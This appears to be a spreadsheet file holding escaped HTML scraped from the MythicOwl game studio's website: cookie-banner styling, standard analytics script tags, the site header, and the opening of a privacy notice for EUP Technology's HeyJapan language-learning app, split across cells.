    <t>button.mgbutton{background-color:#f5811f}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder a.mgbutton,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton,.gdpr_cookie_settings_shortcode_content .gdpr-shr-button.button-green{background-color:#f5811f;border-color:#f5811f}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder a.mgbutton:hover,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton:hover,.gdpr_cookie_settings_shortcode_content .gdpr-shr-button.button-green:hover{background-color:#fff;color:#f5811f}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close span.gdpr-icon{background-color:#f5811f;border:1px solid #f5811f}#moove_gdpr_cookie_info_bar span.change-settings-button.focus-g,#moove_gdpr_cookie_info_bar span.change-settings-button:focus{-webkit-box-shadow:0 0 1px 3px #f5811f;-moz-box-shadow:0 0 1px 3px #f5811f;box-shadow:0 0 1px 3px #f5811f}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close i:hover,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close span.gdpr-icon:hover,#moove_gdpr_cookie_info_bar span[data-href]&gt;u.change-settings-button{color:#f5811f}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected a span.gdpr-icon,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected button span.gdpr-icon{color:inherit}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a span.gdpr-icon,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button span.gdpr-icon{color:inherit}#moove_gdpr_cookie_modal .gdpr-acc-link{line-height:0;font-size:0;color:transparent;position:absolute}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close:hover i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-tab-main-content a:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content span.change-settings-button:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content u.change-settings-button:hover,#moove_gdpr_cookie_info_bar span[data-href]&gt;u.change-settings-button,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content</t>
  </si>
  <si>
    <t>a.mgbutton:focus,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton:focus,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a:focus,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button:focus,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content span.change-settings-button.focus-g,span.change-settings-button:focus,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content u.change-settings-button.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content u.change-settings-button:focus{color:#f5811f}#moove_gdpr_cookie_modal.gdpr_lightbox-hide{display:none}&lt;/style&gt;
&lt;script type='text/javascript' src='https://www.mythicowl.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.mythicowl.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#source=googleanalytics-wordpress#product=ga&amp;#038;property=602e6dc849da5b00114ef9b0' id='googleanalytics-platform-sharethis-js'&gt;&lt;/script&gt;
_x005F_x000D_
_x005F_x000D_
		&lt;style type="text/css" id="wp-custom-css" media="all"&gt;a.slider-button{background-color:#f5811f;color:#fff;padding:15px;border-radius:30px;text-transform:uppercase;font-weight:100}a.slider-button:hover{box-shadow:0px 15px 20px #167ac65e;color:#fff;transform:translateY(-7px)}.pum-theme-570 .pum-container,.pum-theme-lightbox .pum-container{border:8px solid rgba(27,127,204,.8)!important}.pum-theme-570 .pum-content+.pum-close,.pum-theme-lightbox .pum-content+.pum-close{background-color:#f5811f!important}span.news-title{font-weight:700;text-transform:uppercase;margin-top:30px;font-size:40px;line-height:60px;font-family:'Cinzel Decorative','Cardo',serif;color:#f5811f}.content__titleDescription{text-align:center;margin-bottom:30px}.mc4wp-form-fields p{text-align:center}.mc4wp-form-fields input[type="email"]{padding:10px;margin-bottom:10px}.mc4wp-form-fields input.button{text-align:center;margin:0 auto;margin-top:15px;position:unset;padding:18px;cursor:pointer;background-color:#ea5b3a;border:none;color:#fff;border-radius:31px}.mc4wp-form-fields input.button:hover{background-color:#ff911b}.mc4wp-response{text-align:center;margin:15px}.mc4wp-alert.mc4wp-success{color:#3a883a}p img{max-width:940px!important;height:auto!important}.mc4wp-form{width:60%!important;display:inline-block!important}@media screen and (max-width:769px){.mc4wp-form{width:100%!important;display:inline-block!important}.about-nesletter .content__titleDescription{text-align:center;margin-bottom:40px!important}.button{margin-top:25px!important}}@media screen and (min-width:1105px){.item-rotator{position:absolute;top:0;left:0;right:0;margin:0 auto;width:100%!important;height:550px}}.banner-pager a{background:#a0a2a4}img.alignright.size-full.wp-image-1296{margin-left:13%}.page-about .col-left{width:100%!important;text-align:center}.page-about .col-right{width:100%!important;text-align:center}.page-subtitle{font-family:'Cinzel Decorative','Cardo',serif!important;color:#f5811f!important;font-weight:bold!important}.page-games .col-40p{width:100%!important;text-align:center!important}.content.col-60p.right{width:100%!important;text-align:center}.page-contact{text-align:center}#header-lang-selection{z-index:999999999999999999!important}#About_us img.alignright.size-full.wp-image-1296{margin-bottom:-33px}.about-newsletter{border:5px solid #37b1ec;box-shadow:0px 15px 20px #167ac65e;margin:44px auto;max-width:1140px}.about-newsletter .content__titleDescription{font-size:18px}@media screen and (min-width:768px){.about-newsletter .mc4wp-form{padding-left:60px}.about-newsletter{border:5px solid #37b1ec;box-shadow:0px 15px 20px #167ac65e;margin:44px auto;max-width:1140px;display:flex;justify-content:center;align-items:center}}&lt;/style&gt;
		&lt;noscript&gt;&lt;style&gt; .wpb_animate_when_almost_visible { opacity: 1; }&lt;/style&gt;&lt;/noscript&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-61271938-5"&gt;&lt;/script&gt;
&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-61271938-5');
&lt;/script&gt;
	&lt;link rel="stylesheet" type="text/css" media="all" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-cssf004b53169eb40ea98d3c37ad919240c5e7bb196b16f2ea928d7b7bc1cac1.css" /&gt;
		&lt;link rel="stylesheet" type="text/css" media="all" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css7d1af7e1de403e44c303e4566fcdfe688326329a9edbe8a0832095786bc5d.css" /&gt; 
	&lt;link href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-cssbddf8221444f13324d7255c1d487706a36c0b85249c4047b705b022ae24fc.css" rel="stylesheet" media="all"&gt; 
	&lt;link rel="stylesheet" type="text/css" media="all" href="https://www.mythicowl.com/wp-content/cache/fvm/min/1667376001-css286cb5d06a3c4c867f9d79aa12eca21b5b5d4acbd6e9110dd83075540ae5e.css" /&gt;
	&lt;link rel="stylesheet" type="text/css" media="all" href="https://www.mythicowl.com/wp-content/themes/website/css.php" /&gt;
&lt;/head&gt;
&lt;body data-rsssl=1 class="page-template-default page page-id-504 wpb-js-composer js-comp-ver-6.10.0 vc_responsive"&gt;
	&lt;div class="anm" id="header-wrapper"&gt;
		&lt;div class="container"&gt;
			&lt;div class="logo"&gt;
				&lt;a href="https://www.mythicowl.com"&gt;&lt;img src="https://www.mythicowl.com/wp-content/themes/website/img/logo.png" alt="MythicOwl" /&gt;&lt;/a&gt;
			&lt;/div&gt;
			&lt;div class="header-lang"&gt;&lt;div id="header-lang-selection" class="dashicons-before dashicons-arrow-down" &gt;&lt;ul&gt;&lt;li class="active"&gt;&lt;span&gt;en&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.mythicowl.com/pl/polityka-prywatnosci/"&gt;pl&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.mythicowl.com/es/"&gt;es&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.mythicowl.com/de/"&gt;de&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.mythicowl.com/it/"&gt;it&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;
			&lt;div class="header-social"&gt;&lt;div id="header-social-links"&gt;&lt;a href="https://www.facebook.com/MythicOwl/" class="dashicons dashicons-facebook-alt"&gt;&amp;nbsp;&lt;/a&gt;&lt;a href="https://plus.google.com/+steambytes" class="dashicons dashicons-googleplus"&gt;&amp;nbsp;&lt;/a&gt;&lt;a href="https://twitter.com/mythicowlgames" class="dashicons dashicons-twitter"&gt;&amp;nbsp;&lt;/a&gt;&lt;a href="https://www.youtube.com/c/Steambytes" class="dashicons dashicons-video-alt3"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
			&lt;div class="header-menu"&gt;&lt;div class="menu-menu-glowne-angielski-container"&gt;&lt;ul id="menu-menu-glowne-angielski" class="nav-menu"&gt;&lt;li id="menu-item-328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-328 page-on-front"&gt;&lt;a href="https://www.mythicowl.com/#Welcome_to_MythicOwl"&gt;Welcome to MythicOwl&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-153" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-153 page-on-front"&gt;&lt;a href="https://www.mythicowl.com/#Games"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-154" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-154 page-on-front"&gt;&lt;a href="https://www.mythicowl.com/#About_us"&gt;About us&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1450" class="men</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;div style="max-width: 1200px; margin: auto; font-size: 16px; line-height: 26px; margin-top: 30px; color: #474747; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;"&gt;
    &lt;div style="text-align: center;"&gt;
        &lt;strong&gt;
            &lt;span style="font-size: 26px;"&gt;&lt;span data-custom-class="title" style="font-size: 26px !important;"&gt;PRIVACY NOTICE&lt;/span&gt;&lt;/span&gt;
        &lt;/strong&gt;
    &lt;/div&gt;
    &lt;div&gt;&lt;br /&gt;&lt;/div&gt;
    &lt;div style="text-align: center;"&gt;
        &lt;span&gt;
            &lt;strong&gt;
                &lt;span&gt;&lt;span data-custom-class="subtitle"&gt;Last updated&amp;nbsp;April 02, 2022&lt;/span&gt;&lt;/span&gt;
            &lt;/strong&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;&lt;br /&gt;&lt;/div&gt;
    &lt;div&gt;&lt;br /&gt;&lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span&gt;
                &lt;span data-custom-class="body_text"&gt;
                    This privacy notice for&amp;nbsp;EUP Technology JSC (doing business as&amp;nbsp;&lt;span&gt;&lt;span data-custom-class="body_text"&gt;EUP)&lt;/span&gt;&lt;/span&gt; (&amp;quot;
                    &lt;span&gt;
                        &lt;span data-custom-class="body_text"&gt;&lt;strong&gt;EUP&lt;/strong&gt;&lt;/span&gt;
                    &lt;/span&gt;
                &lt;/span&gt;
            &lt;/span&gt;
        &lt;/span&gt;
        &lt;span data-custom-class="body_text"&gt;
            ,&amp;quot; &amp;quot;&lt;strong&gt;we&lt;/strong&gt;,&amp;quot; &amp;quot;&lt;strong&gt;us&lt;/strong&gt;,&amp;quot; or &amp;quot;&lt;strong&gt;our&lt;/strong&gt;&amp;quot;), describes how and why we might collect, store, use, and/or share (&amp;quot;&lt;strong&gt;process&lt;/strong&gt;&amp;quot;) your
            information when you use our services (&amp;quot;&lt;strong&gt;Services&lt;/strong&gt;&amp;quot;), such as when you:
         &lt;/span&gt;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Visit our website&amp;nbsp;at&amp;nbsp;heyjapan.net
                        &lt;span&gt;
                            &lt;span&gt;
                                &lt;span data-custom-class="body_text"&gt;
                                    &lt;span&gt;&lt;span&gt;, or any website of ours that links to this privacy notice&lt;/span&gt;&lt;/span&gt;
                                &lt;/span&gt;
                            &lt;/span&gt;
                        &lt;/span&gt;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Download and use&amp;nbsp;our mobile application&amp;nbsp;(HeyJapan - Learn Japanese)
                        &lt;span&gt;
                            &lt;span&gt;
                                &lt;span data-custom-class="body_text"&gt;
                                    &lt;span&gt;
                                        &lt;span&gt;
                                            &lt;span data-custom-class="body_text"&gt;
                                                &lt;span&gt;&lt;span&gt;,&lt;/span&gt;&lt;/span&gt;
                                            &lt;/span&gt;
                                        &lt;/span&gt;
                                    &lt;/span&gt;
                                &lt;/span&gt;
                            &lt;/span&gt;
                        &lt;/span&gt;
                    &lt;/span&gt;
                    </t>
  </si>
  <si>
    <t>&lt;span data-custom-class="body_text"&gt;
                        &lt;span&gt;
                            &lt;span&gt;
                                &lt;span data-custom-class="body_text"&gt;
                                    &lt;span&gt;&lt;span&gt;&amp;nbsp;our Facebook application&amp;nbsp;(HeyJapan - Learn Japanese),&amp;nbsp;or any other application of ours that links to this privacy notice&lt;/span&gt;&lt;/span&gt;
                                &lt;/span&gt;
                            &lt;/span&gt;
                        &lt;/span&gt;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&lt;span&gt;&lt;span data-custom-class="body_text"&gt;Engage with us in other related ways, including any sales, marketing, or events&lt;/span&gt;&lt;/span&gt;
            &lt;/span&gt;
        &lt;/li&gt;
    &lt;/ul&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span&gt;
                &lt;span data-custom-class="body_text"&gt;
                    &lt;strong&gt;Questions or concerns?&amp;nbsp;&lt;/strong&gt;Reading this privacy notice will help you understand your privacy rights and choices. If you do not agree with our policies and practices, please do not use our Services.</t>
  </si>
  <si>
    <t>If
                    you still have any questions or concerns, please contact us at&amp;nbsp;heyjapan@eupgroup.net.
                 &lt;/span&gt;
            &lt;/span&gt;
         &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;strong&gt;
            &lt;span&gt;&lt;span data-custom-class="heading_1" style="font-size: 19px !important;"&gt;SUMMARY</t>
  </si>
  <si>
    <t>OF KEY POINTS&lt;/span&gt;&lt;/span&gt;
        &lt;/strong&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;
                &lt;strong&gt;
                    &lt;em&gt;
                        This summary provides key points from our privacy notice, but you can find out more details about any of these topics by clicking the link following each key point or by using our table of contents below to find the
                        section you are looking for. You can also click&amp;nbsp;
                    &lt;/em&gt;
                &lt;/strong&gt;
            &lt;/span&gt;
        &lt;/span&gt;
        &lt;a data-custom-class="link" href="#toc" style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; font-size: 15px;"&gt;
            &lt;span style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span data-custom-class="body_text" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;
                    &lt;strong style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; font-size: 15px;"&gt;
                        &lt;em style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;here&lt;/em&gt;
                    &lt;/strong&gt;
                &lt;/span&gt;
            &lt;/span&gt;
        &lt;/a&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;
                &lt;strong&gt;&lt;em&gt;&amp;nbsp;to go directly to our table of contents.&lt;/em&gt;&lt;/strong&gt;
            &lt;/span&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;
                &lt;strong&gt;</t>
  </si>
  <si>
    <t>What personal information do we process?&lt;/strong&gt; When you visit, use, or navigate our Services, we may process personal information depending on how you interact with&amp;nbsp;EUP&amp;nbsp;and the Services, the choices you
                make, and the products and features you use. Click&amp;nbsp;
            &lt;/span&gt;
        &lt;/span&gt;
        &lt;a data-custom-class="link" href="#personalinfo" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;
            &lt;span style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; font-size: 15px;"&gt;
                &lt;span data-custom-class="body_text" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;here&lt;/span&gt;
            &lt;/span&gt;
        &lt;/a&gt;
        &lt;span&gt;&lt;span data-custom-class="body_text"&gt;&amp;nbsp;to learn more.&lt;/span&gt;&lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;&lt;strong&gt;Do we process any sensitive personal information?&lt;/strong&gt;</t>
  </si>
  <si>
    <t>We do not process sensitive personal information.&lt;/span&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;&lt;strong&gt;Do you receive any information from third parties?&lt;/strong&gt; We do not receive any information from third parties.&lt;/span&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;
                &lt;strong&gt;How do you process my information?&lt;/strong&gt; We process your information to provide, improve, and administer our Services, communicate with you, for security and fraud prevention, and to comply with law. We may also
                process your information for other purposes with your consent.</t>
  </si>
  <si>
    <t>We process your information only when we have a valid legal reason to do so. Click&amp;nbsp;
            &lt;/span&gt;
        &lt;/span&gt;
        &lt;a data-custom-class="link" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;
            &lt;span style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span data-custom-class="body_text" style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; font-size: 15px;"&gt;here&lt;/span&gt;
            &lt;/span&gt;
        &lt;/a&gt;
        &lt;span&gt;&lt;span data-custom-class="body_text"&gt;&amp;nbsp;to learn more.&lt;/span&gt;&lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;
                &lt;strong&gt; In what situations and with which&amp;nbsp;parties do we share personal information?&lt;/strong&gt; We may share information in specific situations and with specific&amp;nbsp;third parties. Click&amp;nbsp;
            &lt;/span&gt;
        &lt;/span&gt;
        &lt;a data-custom-class="link" href="#whoshare" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; font-size: 15px;"&gt;
                &lt;span data-custom-class="body_text" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;here&lt;/span&gt;
            &lt;/span&gt;
        &lt;/a&gt;
        &lt;span&gt;&lt;span data-custom-class="body_text"&gt;&amp;nbsp;to learn more.&lt;/span&gt;&lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;
                &lt;strong&gt;How do we keep your information safe?&lt;/strong&gt; We have organizational and technical processes and procedures in place to protect your personal information.</t>
  </si>
  <si>
    <t>However, no electronic transmission over the internet or
                information storage technology can be guaranteed to be 100% secure, so we cannot promise or guarantee that hackers, cybercriminals, or other unauthorized third parties will not be able to defeat our security and improperly
                collect, access, steal, or modify your information. Click&amp;nbsp;
            &lt;/span&gt;
        &lt;/span&gt;
        &lt;a data-custom-class="link" href="#infosafe" style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;here&lt;/span&gt;
            &lt;/span&gt;
        &lt;/a&gt;
        &lt;span&gt;&lt;span data-custom-class="body_text"&gt;&amp;nbsp;to learn more.&lt;/span&gt;&lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;
                &lt;strong&gt; What are your rights?&lt;/strong&gt; Depending on where you are located geographically, the applicable privacy law may mean you have certain rights regarding your personal information.</t>
  </si>
  <si>
    <t>Click&amp;nbsp;
            &lt;/span&gt;
        &lt;/span&gt;
        &lt;a data-custom-class="link" href="#privacyrights" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;
            &lt;span style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t xml:space="preserve">important; font-size: 15px;"&gt;here&lt;/span&gt;
            &lt;/span&gt;
        &lt;/a&gt;
        &lt;span&gt;&lt;span data-custom-class="body_text"&gt;&amp;nbsp;to learn more.&lt;/span&gt;&lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;
                &lt;strong&gt;How do I exercise my rights?&lt;/strong&gt; The easiest way to exercise your rights is by filling out our data subject request form available&amp;nbsp;here:&amp;nbsp;heyjapan@eupgroup.net, or by contacting us. We will consider
                and act upon any request in accordance with applicable data protection laws.
             &lt;/span&gt;
        &lt;/span&gt;
    </t>
  </si>
  <si>
    <t>&lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;&lt;span data-custom-class="body_text"&gt;Want to learn more about what&amp;nbsp;EUP&amp;nbsp;does with any information we collect? Click&amp;nbsp;&lt;/span&gt;&lt;/span&gt;
        &lt;a data-custom-class="link" href="#toc" style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;here&lt;/span&gt;
            &lt;/span&gt;
        &lt;/a&gt;
        &lt;span&gt;&lt;span data-custom-class="body_text"&gt;&amp;nbsp;to review the notice in full.&lt;/span&gt;&lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div id="toc"&gt;
        &lt;span&gt;
            &lt;span&gt;
                &lt;span&gt;
                    &lt;strong&gt;&lt;span data-custom-class="heading_1" style="font-size: 19px !important;"&gt;TABLE OF CONTENTS&lt;/span&gt;&lt;/strong&gt;
                &lt;/span&gt;
            &lt;/span&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#infocollect" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word ! important;"&gt;1.</t>
  </si>
  <si>
    <t>WHAT INFORMATION DO WE COLLECT?&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#infouse" style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word !important;"&gt;2. HOW DO WE PROCESS YOUR INFORMATION?&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#legalbases" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word !important;"&gt;
                    3.&amp;nbsp;
                    &lt;span style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t xml:space="preserve">important; font-size: 15px;"&gt;
                        &lt;span style="word-break: break-word ! important;"&gt;WHAT LEGAL BASES DO WE RELY ON TO PROCESS YOUR PERSONAL INFORMATION?&lt;/span&gt;
                    &lt;/span&gt;
                </t>
  </si>
  <si>
    <t>&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span&gt;&lt;a data-custom-class="link" href="#whoshare" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;4.</t>
  </si>
  <si>
    <t>WHEN AND WITH WHOM DO WE SHARE YOUR PERSONAL INFORMATION?&lt;/a&gt;&lt;/span&gt;
        &lt;/span&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a href="#3pwebsites"&gt;&lt;span data-custom-class="link" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t xml:space="preserve">important; word-break: break-word ! important; font-size: 15px;"&gt;5. WHAT IS OUR STANCE ON THIRD-PARTY WEBSITES?&lt;/span&gt;&lt;/a&gt;
        &lt;/span&gt;
    </t>
  </si>
  <si>
    <t>&lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#cookies" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word !</t>
  </si>
  <si>
    <t>important;"&gt;6. DO WE USE COOKIES AND OTHER TRACKING TECHNOLOGIES?&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#intltransfers" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word ! important;"&gt;7.</t>
  </si>
  <si>
    <t>IS YOUR INFORMATION TRANSFERRED INTERNATIONALLY?&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#inforetain" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word !</t>
  </si>
  <si>
    <t>important;"&gt;8. HOW LONG DO WE KEEP YOUR INFORMATION?&lt;/span&gt;
